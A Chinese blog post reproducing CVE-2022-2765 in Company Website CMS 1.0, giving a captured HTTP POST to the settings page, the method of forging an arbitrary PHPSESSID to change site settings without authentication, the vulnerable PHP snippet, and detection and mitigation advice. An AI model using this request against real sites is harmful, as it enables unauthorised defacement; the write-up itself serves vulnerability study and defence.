Company Website CMS未授权网站篡改漏洞(CVE-2022-2765)

已于 2023-09-27 17:10:40 修改
阅读量582 收藏
点赞数
文章标签: web安全 漏洞复现 CVE
于 2023-08-16 16:10:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68999845/article/details/132322053
版权

Company Website CMS未授权网站篡改漏洞(CVE-2022-2765)

*一、漏洞概述 **

*1.1 漏洞简介*

·漏洞名称:Company Website CMS未授权网站篡改漏洞

·漏洞编号:CVE-2022-2765

·漏洞类型:未授权篡改漏洞

·漏洞威胁等级:超危

·影响范围:Company Website CMS 1.0

·利用条件:默认配置

*1.2 组件描述*

Company Website CMS是Torrahclef个人开发者的一个公司网站/CMS。

*1.3 漏洞描述*

Company Website CMS 1.0存在访问控制错误漏洞,该漏洞源于文件/dashboard/settings的未知功能受到影响,导致不正确的身份验证,攻击可以远程发起,该漏洞利用已向公众披露并可能被使用。

*二、漏洞复现*

*2.1 应用协议*

http

*2.2 环境搭建*

1.下载源码到本地:https://www.sourcecodester.com/download-code?nid=15517&title=Company+Website+CMS+in+PHP+and+MySQL+Free+Source+Code

2.在本地phpmyadmin提前建立数据库

3.配置z_db.php文件

4.访问即可

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-irHWiRsz-1692173342139)(image-20230727100949218.png)]

*2.3 漏洞复现 **

1.漏洞地址为:Company Website CMS/dashboard/settings

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6fSQhp6H-1692173342140)(image-20230727101219150.png)]

2.为了复现未授权访问,提前先登录admin管理员获取该功能点的请求体

POST /Company%20Website%20CMS/dashboard/settings HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------33605517253375376845672324753
Content-Length: 1638
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/Company%20Website%20CMS/dashboard/settings

Cookie:PHPSESSID=gbkblf3q6p9q80kqfdvks2ofs6

Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_title"


-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_keyword"

Church, Marketing
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_desc"

Lorem ipsum dolor sit amet, consectetur adipisicing elit. Impedit nihil tenetur minus quidem est deserunt molestias accusamus harum ullam tempore debitis et, expedita, repellat delectus aspernatur neque itaque qui quod.
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_about"

     Young coders can use events to coordinate timing and communication between different sprites or pieces of their story. For instance, the when _ key pressed block is an event that starts code whenever the corresponding key on the keyboard is pressed.
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_footer"

© 2022 All Rights Reserved
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="follow_text"

Lorem ipsum dolor sit amet, consectetur adipisicing elit. Impedit nihil tenetur minus quidem est deserunt molestias.
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="site_url"

http://localhost:8080/vogue/
-----------------------------33605517253375376845672324753
Content-Disposition: form-data; name="save"


-----------------------------33605517253375376845672324753--

3.退出管理员用户,用普通身份进入前台,通过任意构造cookie字段中的PHPSESSID即可更改

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gJudOJky-1692173342141)(image-20230727102757419.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CbC6RkUh-1692173342141)(image-20230727102823891.png)]

*三、漏洞分析*

*3.1 技术背景*

\

*3.2 代码分析*

更改site-setting配置时没有对用户的cookie做校验,导致任意PHPSESSID都可以修改

<?php
$status = "OK"; //initial status
$msg="";
if(ISSET($_POST['save'])){
		$site_keyword = mysqli_real_escape_string($con,$_POST['site_keyword']);
		$site_desc = mysqli_real_escape_string($con,$_POST['site_desc']);
		$site_title = mysqli_real_escape_string($con,$_POST['site_title']);
		$site_about = mysqli_real_escape_string($con,$_POST['site_about']);
		$site_footer = mysqli_real_escape_string($con,$_POST['site_footer']);
		$follow_text = mysqli_real_escape_string($con,$_POST['follow_text']);
		$site_url = mysqli_real_escape_string($con,$_POST['site_url']);

*3.3 流量分析 **

和正常流量不同的是,攻击者是构造cookie值 --PHPSESSID字段来绕过验证,构造的id值和正常的值明显不同

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Q6oCKr4J-1692173342142)(image-20230727141813498.png)]

正常的admin phpsessid为小写字母+数字随机合成26位的组合

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DsbX2k1w-1692173342142)(image-20230727142026639.png)]

*3.4 绕过方式*

设置任意PHPSESSID来绕过验证

*四、漏洞检测*

*4.1 组件版本自检*

以下版本受该漏洞影响:Company Website CMS 1.0

目前最高版本:Company Website CMS 1.0

*4.2 研判建议 **

登录后台查看cookie值观察请求包的格式是否和真是cookie类似,若明显不同,查看请求头body部分,观察是否存在恶意的语句影响到网站

*五、防范建议*

*5.1 官方修复建议*

未修复

*5.2 临时修复建议*

在设置setting的字段值时校验cookie是否为admin管理员用户

六、*参考链接*

源码下载url:https://www.sourcecodester.com/download-code?nid=15517&title=Company+Website+CMS+in+PHP+and+MySQL+Free+Source+Code

Tkite
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
Spring RCE 漏洞 CVE-2022-22965 的终极解决方案
oscar999的专栏
04-01 1万+
Spring框架爆出的RCE(远程命令执行)漏洞,现在这个漏洞有了统一的编号: **CVE-2022-22965**。 这个漏洞的主要原因是在JDK 9+版本里,Spring MVC 的数据绑定时出现的漏洞
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
最新系统漏洞--Sourcecodester Simple Subscription Website跨站脚本漏洞
热门推荐
weixin_48555088的博客
04-05 20万+
最新系统漏洞2022年4月4日 受影响系统: SourceCodester Simple Subscription Website 1.0 描述: CVE(CAN) ID: CVE-2021-43141 Simple Subscription Website是一个基于web的应用程序。 Sourcecodester. Simple Subscription Website 1.0存在跨站脚本漏洞。攻击者可利用该漏洞通过plan_application的id参数执行跨站脚本。 <**> 建议: 厂
文件上传漏洞总结
u014794539的博客
07-19 795
文件上传漏洞 原理 用户或者管理员上传图片,或者其它文件。如果没有限制上传类型或者限制不严格被绕过,就有可能造成文件上传漏洞。 上传了可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。 上传检测流程 通常一个文件以HTTP协议进行上传时,将以POST请求发送至Web服务器,Web服务器接收到请求并同意后,用户与Web服务器将建立连接,并传输数据。 客户端javascript校验 通过javascript来校验上传文件的后缀是否合法,可以采用白名单,也可以采用
常见21种漏洞编码安全规范及解决方案
weixin_44185213的博客
08-20 5450
常见21种漏洞编码安全规范
授权访问漏洞
niqiu320的博客
04-24 4482
web授权访问 授权访问:授权访问漏洞可以理解为需要安全配置或权限认证的地址,授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 B/S架构中 一般存在后台界面中,访问特定目录下的敏感文件,能直接跳过管理员登录,去访问后台管理内容。 C/S架构中 一般存在默认安装的一些客户端应用程序中,安装人员因缺少安全意识导致攻击者利用。 web授权挖掘实例 查找技巧 1、在访问后台时会在一瞬间加载出后台界面, 这时可以尝试挖掘。 2、在后台地址url中后面输入
7.1 pdo 宝塔面板php_宝塔被爆严重安全事件:数据库授权访问漏洞
weixin_26882891的博客
01-03 268
php中文网最新课程每日17点准时技术干货分享宝塔翻车了,重大漏洞,多站被删库,刚发布紧急更新补丁!2020年8月23日,宝塔面板被爆出严重的安全事件,数据库授权访问漏洞,公网无需鉴权直接 root 权限进入 phpmyadmin,IP或域名地址:888/pma 可以直接进入 phpMyAdmin,导致很多网站数据库被篡改或者直接清理了数据库,可谓损失惨重!7.4.2新加的安全模块导致...
Harbor授权访问漏洞CVE-2022-46463)
m0_49025459的博客
04-29 5801
是为企业用户设计的容器镜像仓库开源项目,包括了权限管理(RBAC)、LDAP、审计、安全漏洞扫描、镜像验真、管理界面、自我注册、HA等企业必需的功能,同时针对中国用户的特点,设计镜像复制和中文支持等功能。
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。... 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1
03-15
2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包1Linux kernel本地权限提升漏洞(CVE-...
网络安全(补充)
m0_62207482的博客
06-11 1018
同步包风暴(SYN Flood)攻击者假造源网址发送多个同步数据包(SYN Packet)给服务器,服务器因无法收到确认数据包(ACK Packet),使TCP/IP协议三次握手无法顺利完成,因而无法建立连接。其原理是发送大量半连接状态的服务请求,使服务主机无法处理正常的连接请求,因而影响正常运作 泪滴攻击暴露出IP数据包分解与重组的弱点,当IP数据包在网络中传输时,会被分解成许多不同的包传送,并借由偏移量字段作为重组的依据。泪滴攻击通过加入过多或不必要的偏移量字段,使计算机系统重组错乱,产生不可预期的后
网络安全扫盲篇名词解释之“挖矿“
weixin_39266374的博客
06-11 982
挖矿、比特币、区块链
网络安全练气篇——OWASP TOP 10
最新发布
weixin_55762309的博客
06-13 757
OWASP(开放式Web应用程序安全项目)是一个开放的社区,由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放,旨在提高对应用程序安全性的认识。其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。最重要的版本应用程序中最严重的十大风险。
【网络安全的神秘世界】web应用程序安全与风险
weixin_54750312的博客
06-05 1367
web攻击的本质,就是通过http协议篡改应用程序(永远不要相信用户的输入)可利用点:请求方法、请求头、请求体利用过程:认证、会话、授权弱口令强口令账号枚举认证不满足强口令条件密码长度至少8位包含大小写字母、数字、特殊字符中的至少3类密码和用户名无相关性尝试大量可能的账号名称,以找出系统中存在的有效账号为了密码爆破做准备,节省攻击时间判断下面属于什么口令:admin@123#1 --弱口令,与用户名相关。
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
05-20
CVE-2022-2048是Jenkins中的一个安全漏洞,存在于Jenkins的SSH插件中。攻击者可以利用该漏洞通过SSH连接到Jenkins主机并执行任意命令。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 CVE-2021-28169是Jenkins中的另一个安全漏洞,存在于Jenkins的Windows安装程序中。攻击者可以利用该漏洞在Jenkins服务器上执行任意代码,甚至获取管理员权限。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 为了防止这些漏洞的利用,建议及时更新Jenkins软件,尽可能使用最新版本,并遵循最佳的安全实践。此外,也可以采取其他措施,如限制Jenkins服务器的网络访问权限,使用防火墙保护服务器等等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Tkite

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值